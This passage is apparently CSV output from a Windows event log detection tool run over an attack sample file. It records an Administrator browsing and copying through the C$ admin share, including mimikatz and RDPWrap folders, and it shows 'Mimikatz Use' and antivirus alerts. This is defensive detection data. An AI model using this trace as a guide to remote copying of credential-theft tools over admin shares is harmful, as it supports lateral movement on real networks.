10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 